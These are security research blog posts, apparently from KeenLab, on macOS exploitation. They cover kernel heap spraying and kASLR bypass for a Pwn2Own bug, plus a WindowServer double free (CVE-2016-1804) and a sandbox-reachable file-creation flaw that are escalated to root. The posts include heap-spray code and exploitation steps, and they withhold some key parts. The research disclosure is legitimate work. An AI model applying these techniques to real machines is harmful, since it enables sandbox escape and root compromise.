        mach_msg_type_number_t  inDataCount,
        kern_return_t *     result)
{
//...
    if (inData) {
//...
        kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t)inData);
        data = CAST_DOWN(vm_offset_t, map_data);
     // must return success after vm_map_copyout() succeeds
        if( inDataCount ) {
            obj = (OSObject *)OSUnserializeXML((const char *)data, inDataCount);
//...
    switch ( flag ) {
//...

        case kIOCatalogAddDrivers: 
        case kIOCatalogAddDriversNoMatch: {
//...
                array = OSDynamicCast(OSArray, obj);
                if ( array ) {
                    if ( !gIOCatalogue->addDrivers( array , 
                                          flag == kIOCatalogAddDrivers) ) {
//...
            }
            break;
//...
}

bool IOCatalogue::addDrivers(
    OSArray * drivers,
    bool doNubMatching)
{
   //...
    while ( (object = iter->getNextObject()) ) {
    
        // xxx Deleted OSBundleModuleDemand check; will handle in other ways for SL

        OSDictionary * personality = OSDynamicCast(OSDictionary, object);
//...
        // Add driver personality to catalogue.
    OSArray * array = arrayForPersonality(personality);
    if (!array) addPersonality(personality);
    else
    {       
        count = array->getCount();
        while (count--) {
        OSDictionary * driver;
        
        // Be sure not to double up on personalities.
        driver = (OSDictionary *)array->getObject(count);
//...
        if (personality->isEqualTo(driver)) {
            break;
        }
        }
        if (count >= 0) {
        // its a dup
        continue;
        }
        result = array->setObject(personality);
//...
    set->setObject(personality);        
    }
//...
}

The addDrivers functions accepts an OSArray with the following easy-to-meet conditions:

OSArray contains an OSDict
OSDict has key IOProviderClass
OSDict must not be exactly same as any other pre-exists OSDict in Catalogue

We can prepare our sprayed content in the array part as the following sample XML shows, and slightly changes one char per spray to satisfy condition 3. Also OSString accepts all bytes except null byte, which can also be avoided. The spray goes as we call IOCatalogueSendData(masterPort, 2, buf, 4096} as many times as we wish.


    
        IOProviderClass
        ZZZZ
        ZZZZ
        
            AAAAAAAAAAAAAAAAAAAAAA
            AAAAAAAAAAAAAAAAAAAAAB
            ...
            ZZZZZZZZZZZZZZZZZZZZZZ

So we have this following steps to play in kalloc.48 to achieve a stable write-anywhere:

Spray lots of combination of 1 ool_msg and 50 IOCatalogueSendData (content of which totally controllable) (both of size 0x30), pushing allocations to continuous region.
free ool_msg at 1/3 to 2/3 part, leaving holes in allocation as shown below.
trigger vulnerable function, vulnerable allocation will fall in hole we previously left, as shown below.

In a nearly 100% chance the heap will layout as the previous figure, which exactly match what we expected. Spraying 50 or more 0x30 sized controllable content in one roll can reduce the possibility of some other irrelevant 0x30 content produced by other kernel activities such as IOMachPort to accidentally be just placed after free block occupied in, also enabling us to do a double-write, or triple-write, which we found crucial in following exploitation steps.

Write a float to control RIP

After we have made the write itself stable, we move forward to turn the write into actual RIP control and/or infoleak. The first idea that will pop up is to overwrite some vtable pointer at the head of some userclients. Seems at first hand this vulnerability is not a very good write primitive because we will certainly corrupt the poor userclient, as shown in the following figure:

In OSX kernel addresses starting with high byte at 0xbf is almost impossible (or you can just say impossible) to be occupied or prepared for some content. But we are also unable to adjust the value we write to start with 0xffffff80 to point the address to a heap location we can control due to the nature of Blitzard.

But thanks to Intel CPUs, we can make a qword write at an unaligned location, i.e. 4byte offset.

This looks reasonable but we found the stability is not promising. This is because in the huge family of userclients, it seems only RootDomainUserClient has a virtual table pointer high bytes of which is 0xffffff80. Other userclient friends all have vtable pointer address 4th byte of which is 0x7f. Address spaces starting with 0xffffff7f00000000 are usually occupied by non-writable sections so it’s not possible to manipulate memory here to gain some degree of memory control, while on the other hand, address spaces high bytes of which are 0xffffff80 expose some possibility to contain heap regions.

Decreasing spray speed? Why?

But RootDomainUserClient is a small userclient and we need to spray lots of them to guarantee that at begining of a particular PAGE there’s good chance the RootDomainUserClient falls there. However quickly we found out the spray speed decreases obviously as the number of userclient increases. After some investigation we found out the root cause of this issue, check the following code snippet.

bool IORegistryEntry::attachToParent( IORegistryEntry * parent,
1621                                 const IORegistryPlane * plane )
1622 {
1623     OSArray *links;
1624     boolret;
1625     boolneedParent;
//...
1635     ret = makeLink( parent, kParentSetIndex, plane );
1636 
1637     if( (links = parent->getChildSetReference( plane )))
1638 needParent = (false == arrayMember( links, this ));
1639     else
1640 needParent = true;
1641 
//...
1669     if( needParent)
1670         ret &= parent->attachToChild( this, plane );
1671 
1672     return( ret );

Here arrayMember performs a linear search on existing attached client, which already implies a O(N^2) time complexity.

Can things be worse? Let’s go further. When userclients are opened, they need to be attached to their parent. This will in turn call parent->attachToChild

bool IORegistryEntry::attachToChild( IORegistryEntry * child,
1684                                         const IORegistryPlane * plane )
1685 {
1686     OSArray *links;
//...
1694 
1695     ret = makeLink( child, kChildSetIndex, plane );

then

 bool IORegistryEntry::makeLink( IORegistryEntry * to,
1314                                 unsigned int relation,
1315                                 const IORegistryPlane * plane ) const
1316 {
1317     OSArray *links;
1318     boolresult = false;
//...
1323 result = arrayMember( links, to );
1324 if( !result)
1325             result = links->setObject( to );
1326 
1327     } else {

The links is an OSArray, and setObject inserts new userclient into the array storage, which calls into this expensive function

unsigned int OSArray::ensureCapacity(unsigned int newCapacity)
185 {
//...
203     newArray = (const OSMetaClassBase **) kalloc_container(newSize);
204     if (newArray) {
205         oldSize = sizeof(const OSMetaClassBase *) * capacity;
206 
207         OSCONTAINER_ACCUMSIZE(((size_t)newSize) - ((size_t)oldSize));
208 
209         bcopy(array, newArray, oldSize);
210         bzero(&newArray[capacity], newSize - oldSize);
211         kfree(array, oldSize);
212         array = newArray;

So in a conclusion, the spraying time has a N^2 time complexity relationship with opened userclient per service. This may not be a big problem for powerful Macbook Pros, but we found the Core M processor in the new Macbook (which is unfortunately the machine we need to exploit in Pwn2Own competition) as slow as grandma, which forces us to found better and faster ways.
Fortunately, a new method pops up and we solved RIP control and info leak problems in one shot. That’s perfect.

IGAccelVideoContext comes to rescue

As we searches for helpful userclients, the following criterias must be met:

It must be reachable from sandbox
Size of userclient must be larger than PAGE_SIZE, and bigger is better (faster spray speed)

We have to admit directly overwriting vtable pointers is not a good solution for our vulnerability. Can we overwrite some field pointers of userclient? The answer is yes. IGAccelVideoContext is a perfect candidate with size 0x2000. Nearly all IOAcceleratorFamily2 userclients have a service pointer associated, and it point to the mother IntelAccelerator. In the following figure we can see at offset 0x528 we saw the appearance of this pointer. It’s a heap location which means we can use the previous mentioned so-called slide-writing to overwrite only lower 4bytes to make it point to heap memory we can control.

RIP control

Further study reveals there are virtual function calls on this pointer. But we need to take extra caution as we cannot directly call the fake service‘s virtual function, because the header of vm_map_copy is not controllable. So we take another approach as we found out context_finish function does an indirect call on service->mEventMachine,

__int64 __fastcall IOAccelContext2::context_finish(IOAccelContext2 *this)
{
  int v1; // eax@1
  unsigned int v2; // ecx@1

  v1 = this->service->mEventMachine->vt->__ZN24IOAccelEventMachineFast219finishEventUnlockedEP12IOAccelEvent(
         this->service->mEventMachine,

We now adjust our goal to overwrite the service field of any IGAccelVideoContext. Given no knowledge of heap addresses, we again need to spray lots of userclients to achieve our goal. After trial and errors we finally took the following steps:

Spray 0x50,000 ool_msgs, pushing heap covering 0xffffff80 bf800000 (B) with controlled content (ool)
free middle parts of ool, fill with IGAccelVideoContext covering 0xffffff80 62388000 (A)
Perform write at A - 4 + 0x528 descending, change service pointer to 0xffffff80 bf800000 (B)
Call each IGAccelVideoContext’s externalMethod and detect corruption

Why we choose the particular addresses A and B? As we recall in previous paragraphs, we can only write float in particular ranges to an expected location, which means we can change pointers like 0xffffff80 deadbeef to 0xffffff80 3xxxxxxx, 0xffffff80 4xxxxxxx, 0xffffff80 cxxxxxxx, 0xffffff80 dxxxxxxx and 0xffffff80 bf800000. These addresses are either too low (kASLR changes in each boot and high kASLR value may shift heap location very high, flooding 0xffffff80 4xxxxxxx), or too high (need lots of spray time to reach). So we choose to write 0xbf800000 to some pointers and taking half from B lead to A.

This code snippet shows how to do the previous mentioned steps:

mach_msg_size_t size = 0x2000;
mach_port_name_t my_port[0x500];
memset(my_port, 0, 0x500 * sizeof(mach_port_name_t));
char *buf = malloc(size);
memset(buf, 0x41, size);
*(unsigned long *)(buf - 0x18 + 0x1230) = 0xffffff8062388000 - 0xd0 + 2;
*(unsigned long *)(buf - 0x18 + 0x230) = 0xffffff8062388000 - 0xd0 + 2;

for (int i = 0; i < 0x500; i++) {
    *(unsigned int *)buf = i;
    printf("number %x success with %x.\n",i , send_msg(buf, size, &my_port[i]));
}
for (int i = 0x130; i < 0x250; i++)
{
    read_kern_data(my_port[i]);
}
printf("press enter to fill in IOSurface2.\n");
io_service_t serv = open_service("IOAccelerator");
io_connect_t *deviceConn2;
deviceConn2 = malloc(0x12000 * sizeof(io_connect_t));
kern_return_t kernResult;
for (int i =0; i < 0x12000; i ++)
{
    kernResult = IOServiceOpen(serv, mach_task_self(), 0x100, &deviceConn2[i]);
    printf("%x with result %x.\n", i , kernResult);
}

You will be more clear with this figure.

Head or middle?

Smart readers may have noticed a critical problem. Given the size of userclient is 0x2000, how can you be sure that head of the userclient falles right at A? Why can not A falls at middle of the IGAccelVideoContext.

Yes you’re right. It’s a 50-50 chance. If A falls at middle of userclient, overwriting A - 4 + 0x528 will corrupt nothing meaningful, lead to failure of exploitation. Can we let this happen? Absolutely not. We need to trigger the write twice, to write both at A - 4 + 0x528 and A - 4 + 0x528 + 0x1000.

So you can now understand why I mentioned earlier we may need to do a double-write in kalloc.48. By changing the value of sprayed content in IOCatalogueSendData in a odd-even style, and triggering the vulnerability multiple times, we can ensure that there’s a nearly 100% chance that both two locations will be overwritten.

Bypassing kASLR

We know Steve Jobs (or Tim Cook?) will not make our life so easy as we still have a big obstacle to overcome: the Royal kASLR, even we have already figured out a way to control RIP. But when there’s a will, there is a way.
Let’s revisit what we have. we have known address A covered with IGAccelVideoContext. Known address B covered with vm_map_copy content controlled and we can also change the content as we wish, just freeing and refill the ool_msgs. Are there any function of some userclients that will return a particular content at a specified address, given we now control the whole body of the fake userclient?

With a bit of luck the externalMethod function get_hw_steppings caught our attention.

__int64 __fastcall IGAccelVideoContext::get_hw_steppings(IGAccelVideoContext *a1, _DWORD *a2)
{
  __int64 service; // rax@1

  service = a1->service;
  *a2 = *(_DWORD *)(service + 0x1140);
  a2[1] = *(_DWORD *)(service + 0x1144);
  a2[2] = *(_DWORD *)(service + 0x1148);
  a2[3] = *(_DWORD *)(service + 0x114C);
  a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);
  return 0LL;
}

Eureka!

1	a2[4] = (unsigned __int8 )((_QWORD )(service + 0x1288) + 0xD0LL);

Given the service + 0x1288 is controlled by us, this is a perfect way to return value at arbitrary address. Although only one byte is returned, it’s not a big deal because we can free and refill the ool_msgs as many times as we wish and read one byte by one. We now come up with these steps.

By spraying we can ensure 0xf… 62388000(A) lies an IGAccelVideoContext. And 0xf… bf800000(B) lies an vm_map_copy with size 0x2000
Overwrite the service pointer to B, point to controlled vm_map_copy filled with 0x4141414141414141 (except at 0x1288 set to A - 0xD0)
Test for 0x41414141 by calling get_hw_steppings on sprayed userclients
If match, we get the index of userclient being corrupted. a2[4] returns a byte at A!
You will be more clear with this figure:

Head or middle, again

Smart reader will again noticed that we are currently assuming A falls at beginning of a IGAccelVideoContext. Also, nobody guarantees B falls right at the beginning the 0x2000 size vm_map_copy. It’s also a 50-50 chance.

For the latter, we take the same approach. When we are preparing ool_msg, we change 0x1288 and 0x288 both to A - 0xD0. For the former problem it’s a bit more complicated.

We have an observation that at the 0x1000 offset of a normal IGAccelVideoContext, the value are zero. This gives us a way to distinguish the two situations, given that now we can read out the content at address A. We can use an additional read to determine if the address is at A or A+0x1000. If we try A but its actually at A+0x1000, we will read byte at +0x1000 of IGAccelVideoContext, which is 0, then we can try again with A+0x1000 to read the correct value.

These two figures may give you a more clearly concept on this trial-and-error approach.

Wrap it up

Leak arbitrary address, leak vtable pointer, prepare your gadgets, ahh. I’m a bit tired hmm, so if you are curious about what the blitzard vulnerability itself actually is, don’t miss our talk at Mandalay Bay GH at August 3 11:30, Blackhat USA. Wish to see you there :)

Also, it’s a pity the vulnerability is not selected for pwnie nominations, we will come up with a better one next year :)

Here is the video, some spraying time is omitted:

WindowServer: The privilege chameleon on macOS (Part 2)

2016-07-28T05:06:30.000Z

From my last blog post “WindowServer: The privilege chameleon on macOS (Part 1)”, we discussed some basic concepts, the history and architecture of WindowServer, as well as the details of CVE-2016-1804 - A Use-After-Free (Or we can also call it double free) bug with very small time window. Several troubles still exist before we can write the exploit code of this bug, now let’s resolve them one by one.

0x9 Sandbox not defined == Cannot open?

Since the Free and Use primitive reside in a single MIG call, it is not possible to fill in the controlled data in between two frees. Also all CoreGraphics server APIs are running in a single-threaded server loop, we can not use other APIs in CoreGraphics to control the freed memory content. The only possible way is to leverge QuartzCore APIs which run at another thread. QuartzCore is also known as CoreAnimation. Compared with CoreGraphics, QuartzCore framework provides with more complex graphics operation such as animation when multiple layers are involved in the action. Unlike CoreGraphics, QuartzCore service is not explicitly defined in application’s sandbox.

Does it mean we cannot open the port of QuartzCore service? By taking traditional approach, we cannot open as it is blocked by sandbox. But let’s review the last blog post, did we miss some key part?

Yes, remember we have three different types of complex message: OOL descriptor message, port descriptor message, and OOL port descriptor message. Port descriptor is needed in case we can not create a mach port at our process and have to use IPC to make the server process to create the port and send it back to our process. This is quite similiar with DuplicateHandle API on Windows platform. Thus, we assume there exists a server interface in CoreGraphics API that can help create the service port of com.apple.CARenderServer. By auditing the code, we finally find the right one: __XCreateLayerContext:

0xA QuartzCore: the hidden interface, and new territory

Because QuartzCore service is not explicitly defined to allow open in application sandbox. By code auditing we find there is no sandbox consideration in any of its service interface.For example, _XSetMessageFile interface allows sandboxed application to set the log file path and file name. In other words, sandboxed application can create any files under any path within windowserver user’s privilege, although the windowserver privilege is quite limited, it still deviates from the original sandbox’s privilege scope. On iOS the impact is higher because the backboardd process is running under mobile user, which means you can create any file under the path where mobile user can create.

__int64 __fastcall _XSetMessageFile(__int64 a1, __int64
   a2)
{
if ( memchr((const void *)(a1 + 40), 0, v5) ) //a1 + 40
  is user controllable, which is the file path
{
  LOBYTE(v6) = CASSetMessageFile(*(unsigned int *)(a1 + 12), 
  (const char *)(a1 + 40)); //will set create thefile whose path and filename can be specified by user
*(_DWORD *)(a2 + 32) = v6;
  }
else
{ 
LABEL_14:
    *(_DWORD *)(a2 + 32) = -304;
}
  result = *(_QWORD *)NDR_record_ptr;
  *(_QWORD *)(a2 + 24) = *(_QWORD *)NDR_record_ptr;
  return result;
}

But this bug is not critical in our case. By calling __XCreateLayerContext, at least we found a way now to control another thread and had some hope for exploiting CVE-2016-1804.

0xB Crash on failure?

In race condition case, the key factor of the exploitability is whether failure of racing will result in panic or process crash especially when the racing time window is small. At the first glance, it is normal for process to crash with a double free on same memory block. Considering the following code:

char * buf = NULL;
buf = malloc(0x60);
memset(buf , 0x41, 0x60);
free(buf);
free(buf);

When running on OS X, it will result in process crash:

checkCFData(878,0x7fff79c57000) malloc: *** error for object 0x7fe9ba40f000: pointer being freed was not allocated*** set a breakpoint in malloc_error_break to debug[1]    878 abort

Now let’s try CFRelease case:

1
2
3

CFDataRef data = CFDataCreateWithBytesNoCopy(kCFAllocatorDefault, buf, 0x60, kCFAllocatorNull);
CFRelease(data);
CFRelease(data); //No crash will happen

Surprisingly there is no crash! That is good news for this bug. It means we can try triggering this bug a lot of times until success. Here is the strategy to fill in controlled data in between two CFRelease:

0xC Race to fill in the controlled data

The next problem is: what API in QuartzCore should be chosen to fill in the freed CFData struct? This is still a challenge because:

CFData is 0x30 in size, we need an object whose size is also 0x30 to fill in
In that API, not so much noise (a lot of irrelevant 0x30 objects may cause higher rate of failure )
Higher rate of being filled in. (Better to be a loop to allocate objects again and again)
The first 8 bytes of the 0x30 object can be controlled. (Can confuse the method table of CFData)
This part is the key in the whole exploitation process and I would like to discuss in detail next week at Black Hat USA.

After finding a good API candidate to fill in, we got stable crash on controlled address:

0xD HeapSpray

Heap spraying is always an interesting problem in 64bit process. On OS X, for small block heap memory allocation, a randomized heap based is involved. Considering the following code:

1 2	buf = malloc(0x60); printf("addr is %p.\n", buf);

By running the code several times, the results are:

addr is 0x7fd1e8c0f000.addr is 0x7fb720c0f000.addr is 0x7f8b2a40f000.

We can see the 5th byte of the address varies between diferent processes, which means you need to spray more than 1TB memory to achieve reliable heap spraying. However for large block (larger than 0x20000) of memory, the randomization are not that good:

1 2	buf = malloc(0x20000); printf("addr is %p.\n", buf);

The addresses are like this:

addr is 0x10d2ed000.addr is 0x104ff7000.addr is 0x10eb68000.

The higher 4 bytes are always 1, and the address allocation is from lower address to higher address. By allocating a lot of 0x20000 blocks we can make sure some fixed addresses filling with our desired data. The next question is: how can we do heap spraying in WindowServer process? There are a lot of interfaces within CoreGraphics, and we need to find those which meet the following criteria:
– Interface accepts OOL message
– Interface will allocate user controllable memory and not free it immediately
We finally pick up interface _XSetConnectionProperty. We can specify different key/value pairs and set it in the connection based dictionary, where the memory will be kept within WindowServer process.

void __fastcall CGXSetConnectionProperty(int a1, __int64 a2, __int64 a3)
{
...
v3 = a3;
if ( !a2 )
  return;
if ( a1 )
{
  v5 = CGXConnectionForConnectionID();
  v6 = v5;
if ( !v5 )
   return;
 v7 = *(_QWORD *)(v5 + 160); //get the connection based dictionary, if not exist, create it.
if ( !v7 ) {
v7 = CFDictionaryCreateMutable(0LL, 0LL,
kCFTypeDictionaryKeyCallBacks_ptr,
kCFTypeDictionaryValueCallBacks_ptr);
   *(_QWORD *)(v6 + 160) = v7;
 }
if ( v3 )
CFDictionarySetValue(v7, a2, v3);
  ...
}

0xE ASLR/DEP/Code Execution

ASLR is not a problem in our case as we pwn Safari browser first and the base addresses of most apple framework are the same among different processes. DEP can also be bypassed by ROP. Code execution is not a big deal, can refer to the phrack article.

0xF Hey Chameleon, Now I want you to be ROOT!

As we know, we successfully bypassed Apple sandbox to get current user’s context by exploiting CVE-2014-1314. And by finding the hidden interface, we obtained a new territory and found a bug which allows writing arbitrary files under _windowserver’s context.
How about CVE-2016-1804? As we got arbitrary code execution within WindowServer process, why not try calling setuid(0) and see what happened?
The result is amazing, we successfully get root!!

root  560 0.0 0.7  2614800  33888   ??  SXs   4:30上午   0:00.04 /System/Library/Frameworks/ApplicationServices.framework/Frameworks/CoreGraphics.framework/Resources/WindowServer -daemon

Why? We know that WindowServer has session management feature and need to fork new login process under user’s context, so it must have setuid privilege. But how it is implemented?

Actually when WindowServer process is firstly spawned by launchd daemon, it is running as root which inherited its parent process’s uid.

(lldb) chenliangs-Mac:~ chenliang$ sudo lldb(lldb) process attach --name WindowServer  --waitforProcess 910 stopped* thread #1: tid = 0x5cda, 0x00007fff6314d302 dyld`stat64 + 10, stop reason = signal SIGSTOP    frame #0: 0x00007fff6314d302 dyld`stat64 + 10dyld`stat64:->  0x7fff6314d302 <+10>: jae    0x7fff6314d30c            ; <+20>    0x7fff6314d304 <+12>: mov    rdi, rax    0x7fff6314d307 <+15>: jmp    0x7fff6314c89c            ; cerror_nocancel    0x7fff6314d30c <+20>: ret    Executable module set to "/System/Library/Frameworks/ApplicationServices.framework/Frameworks/CoreGraphics.framework/Resources/WindowServer".Architecture set to: x86_64-apple-macosx.(lldb) expr -- (int)getuid()(int) $0 = 0(lldb) expr -- (int)getgid()(int) $1 = 0(lldb) expr -- (int)geteuid()(int) $2 = 0(lldb) expr -- (int)getegid()(int) $3 = 0

Then some code is executed to change WindowServer’s euid to 88 (_windowserver) while its uid is never changed. That will limit the process’s capability if we have logical bug as _windowserver’s permission is quite limited:

(lldb) bt* thread #1: tid = 0x2ef1, 0x00007fff955c364c libsystem_kernel.dylib`seteuid, queue = 'com.apple.main-thread', stop reason = breakpoint 1.2  * frame #0: 0x00007fff955c364c libsystem_kernel.dylib`seteuid    frame #1: 0x00007fff8612db15 CoreGraphics`CGXRestoreCredentials + 192    frame #2: 0x00007fff8641024d CoreGraphics`CGXRunOneServicesPass + 784    frame #3: 0x00007fff86314f9d CoreGraphics`post_notification(CGSNotificationType, void*, unsigned long, bool, double, int, unsigned int const*, int) + 325    frame #4: 0x00007fff861fc4f2 CoreGraphics`CGXDisplaysWillReconfigure + 1230    frame #5: 0x00007fff861f6110 CoreGraphics`reconfigureDisplays + 2351    frame #6: 0x00007fff861f36b6 CoreGraphics`setup_and_reconfigure_displays + 314    frame #7: 0x00007fff86412001 CoreGraphics`CGXServer + 6213    frame #8: 0x000000010cc24f7e WindowServer`_mh_execute_header + 3966    frame #9: 0x00007fff91e975ad libdyld.dylib`start + 1    frame #10: 0x00007fff91e975ad libdyld.dylib`start + 1(lldb) reg readGeneral Purpose Registers:       rax = 0x0000000000000000       rbx = 0x0000000000000058       rcx = 0x00007fff955c363e  libsystem_kernel.dylib`setegid + 10       rdx = 0x0000000000000000       rdi = 0x0000000000000058 // change euid to _windowserver(88)       rsi = 0x00007fff52fd2fa0       rbp = 0x00007fff52fcaf30       rsp = 0x00007fff52fcaef8        r8 = 0x0000000000000002        r9 = 0x0000000000000000       r10 = 0x00007fff955c3656  libsystem_kernel.dylib`seteuid + 10       r11 = 0x0000000000000292       r12 = 0x00007fc8c1412290       r13 = 0x0000000000000101       r14 = 0x0000005800000058       r15 = 0x00007fff52fd2fa0       rip = 0x00007fff955c364c  libsystem_kernel.dylib`seteuid    rflags = 0x0000000000000202        cs = 0x000000000000002b        fs = 0x0000000000000000        gs = 0x0000000000000000

And that will make ps utility show _windowserver in the output:

_windowserver 910 0.0  1.6  3368352  78004   ??  SXs   7:51上午   0:02.57 /System/Library/Frameworks/ApplicationServices.framework/Frameworks/CoreGraphics.framework/Resources/WindowServer -daemon

That is quite confusing. If we use lldb, we can clearly figure out its euid is _windowserver while its uid is still root, and make WindowServer a privilege chameleon.

(lldb) expr -- (int)getuid()(int) $4 = 0(lldb) expr -- (int)geteuid()(int) $5 = 88(lldb) expr -- (int)getgid()(int) $6 = 0(lldb) expr -- (int)getegid()(int) $7 = 88

So finally we wrap up CVE-2016-1804 with full remote root by chaining with Safari exploit.

Oh, wait… How to race and fill in the controlled data in between two free, is still unknown? No worries, next week at Black Hat you will get all the answer…

WindowServer: The privilege chameleon on macOS (Part 1)

2016-07-22T05:02:15.000Z

When talking about Apple Graphics, the WindowServer component should not be neglected. Rencently KeenLab has been talking about Apple graphics IOKit components at POC 2015 “OS X Kernel is As Strong as its Weakest Part“, CanSecWest 2016 “Don’t Trust Your Eye: Apple Graphics Is Compromised!“, and RECon 2016 “Shooting the OS X El Capitan Kernel Like a Sniper“, however the userland part is seldomly mentioned in public.

This week Pwnie announced bug nominations for 2016, where the windowserver bug CVE-2016-1804 is listed , it made me think of writing something. But when I started writing, I realized it is a long story. Then I realized a long story can be cut into short stories (I also realized my IQ is low recently which many of my colleagues have pointed out, due to extremely hot weather in Shanghai maybe, or not…)

So…I decided to split the whole story into 3. In part 1, I will mainly focus on the history of windowserver, basic concepts, architecture, CVE-2014-1314 (A design flaw which we used to take down OS X Mavericks at Pwn2Own 2014) and finally, details of the pwnie nomination bug: CVE-2016-1804, which we used to take down the latest OS X El Capitan remotely with a browser exploit and escalated to root privilege. However when I first discovered CVE-2016-1804 last year, it had been considered unexploitable, at least for 1 week. Part 1 then wrapped up here with questions/challenges.

Next week I will release part 2 for the partial exploitation by introducing an 0day which gave me inspiration of the successful exploitation of CVE-2016-1804. The last part: part 3, which is the most exciting part, is NOT a blog post, instead it will be discussed at Black Hat 2016 Briefings “SUBVERTING APPLE GRAPHICS: PRACTICAL APPROACHES TO REMOTELY GAINING ROOT“

Ok, now let’s start the short story:

0x1 Introduction

Apple Graphics is one of the most complex components in Apple world (OS X and iOS). It mainly contains the following two parts:
– Userland part
– Kernel IOKit drivers
OS X and iOS have similar graphics architecture. The userland graphics of OS X is mainly handled by “WindowServer” process while on iOS it is “SpringBoard/backboardd” process. The userland graphics combined with the kernel graphics drivers are considered as counterpart of “win32k.sys” on Windows, although the architecture is a little diferent between each other. The userland part of Apple graphics is handled in a separate process while Windows provides with a set of GDI32 APIs which calls the kernel “win32k.sys” directly. Apple’s approach is more secure from the architecture’s perspective as the userland virtual memory is not shared between processes, which increase the exploitation difficulty especially when SMEP/SMAP is not enforced.

0x2 WindowServer Overview

The WindowServer process mainly contains two private framework: CoreGraphics and QuartzCore, each running under a separate thread. Each framework contains two sets of APIs:
– Client side API: Functions starting with “CGS” (CoreGraphics) or “CAS” (QuartzCore)
e.g

void __fastcall _CGSGetWindowShape(mach_port_t a1, int a2, _QWORD *a3, _DWORD *a4)
{
...
}

– Server side API: Functions starting with “__X” (e.g __XCreateSession)
e.g.

__int64 __fastcall _XGetWindowShape(_DWORD *a1, __int64 a2)
{
...
}

The client side API can be called from any client processes. Client APIs are implemented by obtaining the target mach port, composing a mach message and sending the message by calling mach_msg mach API with specific message IDs and send/receive size. Server side API is called by WindowServer’s specific thread. Both CoreGraphics and QuartzCore threads have dedicated server loop waiting for new client message to reach. Once client message reaches, the dispatcher code intercepts the message and calls the corresponding server API based on the message ID.
Here is a snapshot of WindowServer process:

0x3 Sandbox consideration

Almost every process (including sandboxed applications) can call interfaces in WindowServer process through MIG (Mach Interface Generator) IPC. Browser applications including Safari can directly reach WindowServer interfaces from restrictive sandboxed context. Vulnerabilities in WindowServer process may lead to sandbox escape from a remote browser based drive-by attack. It may also lead to root privilege escalation as the WindowServer process behaves like a privilege chameleon. Safari WebContent process has its own sandbox profile defined in /System/Library/Frameworks/WebKit.framework/Versions/A/Resources/com.apple.WebProcess.sb, WindowServer service API is allowed by the following rule:

(allow mach-lookup      (global-name "com.apple.windowserver.active"))

Here it seems the QuartzCore interface is not explicitly defined, so here we focus on CoreGraphics interfaces first.

Three years ago when we decided to explore sandbox escape vulnerabilities on OS X, we picked up attack surfaces which meets the following critiria:

Interfaces which can be reached by browser (Because at that time my IQ was not that low.)
Components which run at weak sandbox profiles or no sandbox
Components which have been lasting for a long time, especially those born before Apple Sandbox was introduced at OS X Leopard. This is typical hacker’s thought which I learned from the ASLR story. When ASLR was first introduced in Windows Vista, a lot of previously useless information leak vulnerabilties becomes vital in breaking ASLR, most of which can be very reliably exploited as they are nothing relating to memory corruption, instead they are just some logic flaws which were never considered flaw before ASLR was born.
etc.

After that, windowserver became one of our key focus on vulnerability discovery work.

0x4 MIG IPC

MIG IPC can be described by the following graph from Google PZ’s team blog:

Source: http://googleprojectzero.blogspot.kr/2014/11/pwn4fun-spring-2014-safari-part-ii.html

Like the IPC on other morden OS, MIG IPC can pass information between processes. Considering the following senario, kernel is involved in the process of the IPC:

When process A wants to pass a pointer to process B
When process A wants to pass a mach port to process B (On Windows, similiar concept is HANDLE)
On the above senario, it is not easy just to pass the value itself between processes, instead kernel needs to map the address or allocate a mach port which represents kernel object for the target process. In Apple world, in the first senario the message is called Out Of Line(OOL) descriptor message and the second is called port descriptor message.
Let’s look at the API mach_msg defined by MIT:
```
mach_msg_return_t   mach_msg                  (mach_msg_header_t                msg,                   mach_msg_option_t             option,                   mach_msg_size_t            send_size,                   mach_msg_size_t        receive_limit,                   mach_port_t             receive_name,                   mach_msg_timeout_t           timeout,                   mach_port_t                   notify);
```

PARAMETERS
msg
[pointer to in/out structure containing random and reply rights]
A message buffer used by mach_msg both for send and receive. This must be naturally aligned.

The msg parameter is interesting, it starts with mach_msg_header_t structure:

typedefstruct 
{
  mach_msg_bits_tmsgh_bits;
  mach_msg_size_tmsgh_size;
  mach_port_tmsgh_remote_port;
  mach_port_tmsgh_local_port;
  mach_port_name_tmsgh_voucher_port;
  mach_msg_id_tmsgh_id;
} mach_msg_header_t;

Here the highest bit of the 32bit msgh_bits defines whether it is a simple message (0x0) or a complex one (0x1). Simple message means no pointer or port is passed to the target process, and in this case the real message data is just apended right after the mach_msg_header_t.
Complex message can be categorized into 3:

typedef union
{
  mach_msg_port_descriptor_tport;
  mach_msg_ool_descriptor_tout_of_line;
  mach_msg_ool_ports_descriptor_tool_ports;
  mach_msg_type_descriptor_ttype;
} mach_msg_descriptor_t;

The three types are:

mach_msg_port_descriptor_t: a port descriptor message
mach_msg_ool_descriptor_t: OOL descriptor message
mach_msg_ool_ports_descriptor_t: OOL port descriptor (Pointer pointing to a list of mach ports)
The type definition is:
1
2
3
#define MACH_MSG_PORT_DESCRIPTOR 0
#define MACH_MSG_OOL_DESCRIPTOR 1
#define MACH_MSG_OOL_PORTS_DESCRIPTOR 2

So when you want to send a complex message, set the highest bit of the 32bit msgh_bits to 1 in mach_msg_header_t, followed by msgh_descriptor_count indicating the number of complex descriptors in the message:

typedef struct
{
        mach_msg_size_t msgh_descriptor_count;
} mach_msg_body_t;

Then append a list of mach_msg_port_descriptor_t or mach_msg_ool_descriptor_t, or mach_msg_ool_ports_descriptor_t to finish composing the message and send to the target process.

It seems to be useless to put these basic concepts here, but believe me, it is useful (maybe in part 2).

0x5 CoreGraphics Interface

The CoreGraphics interfaces are divided into following categories:
– Workspace
– Window
– Transitions
– Session
– Region
– Surface
– Notifications
– HotKeys
– Display
– Cursor
– Connection
– CIFilter
– Event Tap
– Misc
When sandbox was introduced on Leopard, the first thought to bypass is to do a series of mouse/keyboard simulation operations (For example, to simulate moving to calc icon and double clicking it.) The first trial made me excited because it was quite easy to move the cursor on the window to anywhere from a sandboxed environment by calling _XWarpCursorPosition:

__int64 __fastcall _XWarpCursorPosition(_DWORD *_RDI, __int64 a2)
{
  __int64 *v6; // rdi@3
  signed int v7; // er14@3
  __int64 v13; // r15@7
  __int64 v14; // rax@7
  __int64 result; // rax@14
  int v21; // [rsp+0h] [rbp-20h]@3

  if ( *_RDI < 0 || _RDI[1] != 44 )
  {
    *(_DWORD *)(a2 + 32) = -304;
  }
  ...
    v7 = CGXWarpCursorPosition(0LL);
  ...
  return result;
}

And quickly I located the function to place a double click event: __XPostFilteredEventTapDataSync:

